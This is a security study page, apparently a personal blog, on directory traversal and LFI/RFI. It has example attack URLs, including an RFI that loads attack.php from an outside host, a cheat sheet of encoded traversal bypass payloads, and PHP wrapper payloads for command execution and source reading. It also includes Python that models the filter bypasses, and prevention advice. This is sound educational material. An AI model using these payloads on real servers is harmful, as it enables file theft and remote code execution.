Directory traversal & LFI,RFI

Directory traversal

🔎 What is Directory traversal?

Directory traversal (also known as file path traversal) is a vulnerability that lets an attacker read arbitrary files on the server running the application. That can include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases the attacker can also write to arbitrary files on the server, which allows them to modify application data or behaviour and ultimately take control of the server.


🔎 What is the difference between Directory traversal and LFI/RFI?

The key difference between LFI (Local File Inclusion) / RFI (Remote File Inclusion) and directory traversal is whether the file is executed. Path traversal only reads a file and returns its contents. LFI and RFI pass the attacker-controlled path to an include-style call (include/require in PHP), so the file, local in the LFI case and fetched from an attacker's host in the RFI case, is both read and executed as code.

# LFI
http://192.168.100.10/bWAPP/file.php?language=../../../../../../etc/passwd&action=go
# RFI
http://192.168.100.10/bWAPP/file.php?language=http://192.168.5.6/attack.php

File path traversal, traversal sequences stripped non-recursively

์„œ๋ฒ„์—์„œ path๊ตฌ๋ฌธ(../)์„ ์ œ๊ฑฐํ•  ๊ฒฝ์šฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-04 แ„‹แ…ฉแ„’แ…ฎ 9 40 58

....//....//....//etc/passwd
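The following Python model of that filter is an added example, not code from the original page or from the lab. It assumes a hypothetical endpoint that removes `../` from the parameter once and then joins the result onto a document root (BASE_DIR, an assumed value), and it shows why the nested payload works, why a recursive strip closes that particular hole, and, going one step beyond the lab, why a filter that runs before URL decoding is defeated by the `%2e%2e%2f` form listed in the cheat sheet below.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root of the vulnerable endpoint (assumption, not from the page).
BASE_DIR = "/var/www/images"


def strip_once(user_path: str) -> str:
    """Non-recursive filter: a single pass of str.replace, like the lab's server."""
    return user_path.replace("../", "")


def strip_recursive(user_path: str) -> str:
    """Repeat the removal until no '../' is left anywhere in the string."""
    while "../" in user_path:
        user_path = user_path.replace("../", "")
    return user_path


def filter_then_decode(user_path: str) -> str:
    """Filter first, URL-decode afterwards: the ordering that %2e%2e%2f abuses.

    The recursive strip never sees a literal '../', so it removes nothing, and the
    decoding step that follows recreates the traversal sequence.
    """
    return unquote(strip_recursive(user_path))


def resolved(filtered_path: str) -> str:
    """Where the server would actually open the file after joining and normalising."""
    return posixpath.normpath(posixpath.join(BASE_DIR, filtered_path))


def escapes_base(filtered_path: str) -> bool:
    """True if the final path lies outside BASE_DIR."""
    final = resolved(filtered_path)
    return not (final == BASE_DIR or final.startswith(BASE_DIR + "/"))


if __name__ == "__main__":
    # Constructed payloads, mirroring the ones on this page.
    nested = "....//....//....//etc/passwd"
    print(escapes_base(nested))                       # False: harmless without the filter
    print(strip_once(nested))                         # ../../../etc/passwd
    print(resolved(strip_once(nested)))               # /etc/passwd: the filter created the traversal
    print(escapes_base(strip_recursive(nested)))      # False: recursive removal neutralises it
    encoded = "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
    print(escapes_base(filter_then_decode(encoded)))  # True: wrong order of filter and decode
```

Note that the raw nested payload is harmless on its own: `....` is just an oddly named directory, so the traversal only appears once the filter has removed the inner `../`. Neither variant of stripping is the right fix; the check belongs on the canonicalised path after all decoding has happened.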

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2021-11-04 แ„‹แ…ฉแ„’แ…ฎ 9 41 25



🔥 Cheat sheet

  • Basic exploitation
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
  • 16-bit Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
  • UTF-8 Unicode encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
  • Bypass "../"
// Bypass a filter that replaces "../" with ""
..././
...\.\

// Bypass with ";" (path-parameter parsing, e.g. on Java servlet containers)
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
  • Double URL encoding
. = %252e
/ = %252f
\ = %255c
  • LFI PHP wrappers
# expect:// (runs a system command; requires the PECL expect extension, which is not enabled by default)
www.useegod/index.php?page=expect://ls
# php://filter (reads a server-side file through encode/decode filters; base64-encoding the output returns PHP source verbatim instead of executing it)
www.useegod/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
# zip:// (opens an archive and executes the file inside it; in a URL the # must be sent as %23, otherwise the browser treats it as a fragment and never sends it)
www.useegod/index.php?page=zip://file.zip#shell.php

👀 How to prevent?

  • Filter user-supplied directory and file names. Replacing a sequence with an empty string can be bypassed (see the ....// payload above), so replace with a different string, or better, reject the request outright and verify that the canonicalised path still lies inside the intended directory.
Filter strings
../ ./ /. ..\ .\ % ; %00 %2F etc.
  • Store download file names in the DB and, on download, compare the requested name against the stored one before serving the file.
  • Always enforce a valid-session check on pages that serve downloads.
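The three controls above combined in Python, as an added example that is not the page's own code: the request carries only an opaque id that is looked up in a constructed stand-in for the DB table, the session is checked first, and the stored name is still canonicalised and confined to the download directory. The directory names and the DOWNLOADS table are assumptions made for the example.

```python
import os
from typing import Optional

# Constructed stand-in for the DB table the page describes: the client sends only
# an opaque id, and the filename that reaches the filesystem never comes from the request.
DOWNLOADS = {
    "1001": "report-2021.pdf",
    "1002": "logo.png",
}


def resolve_inside(base_dir: str, name: str) -> Optional[str]:
    """Return the canonical path of base_dir/name, or None if it leaves base_dir.

    realpath() collapses '..' segments and follows symlinks, so a link placed
    inside the directory but pointing outside it is rejected as well.
    commonpath() is used instead of startswith() because '/var/www/files2'
    would otherwise pass a check against '/var/www/files'.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def download_path(base_dir: str, file_id: str, session_valid: bool) -> Optional[str]:
    """Apply the page's three controls in order: session, DB lookup, path confinement."""
    if not session_valid:
        return None
    name = DOWNLOADS.get(file_id)  # unknown id: nothing is served
    if name is None:
        return None
    # Defence in depth: even a name that came from the DB is confined to base_dir,
    # so a poisoned row cannot turn the download handler into a file-read primitive.
    return resolve_inside(base_dir, name)


if __name__ == "__main__":
    base = "/var/www/files"  # hypothetical download directory
    print(download_path(base, "1001", True))              # served
    print(download_path(base, "1001", False))             # None: no valid session
    print(download_path(base, "../../etc/passwd", True))  # None: not an id in the table
    print(resolve_inside(base, "../../../etc/passwd"))    # None: leaves base_dir
    print(resolve_inside(base, "/etc/passwd"))            # None: absolute path discards base_dir
    print(resolve_inside(base, "../files2/x.pdf"))        # None: sibling-prefix trick
```

Note the `/etc/passwd` case: `os.path.join` discards the base when the second argument is absolute, which is exactly why the result has to be checked after joining rather than trusted because it was built from a fixed prefix.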
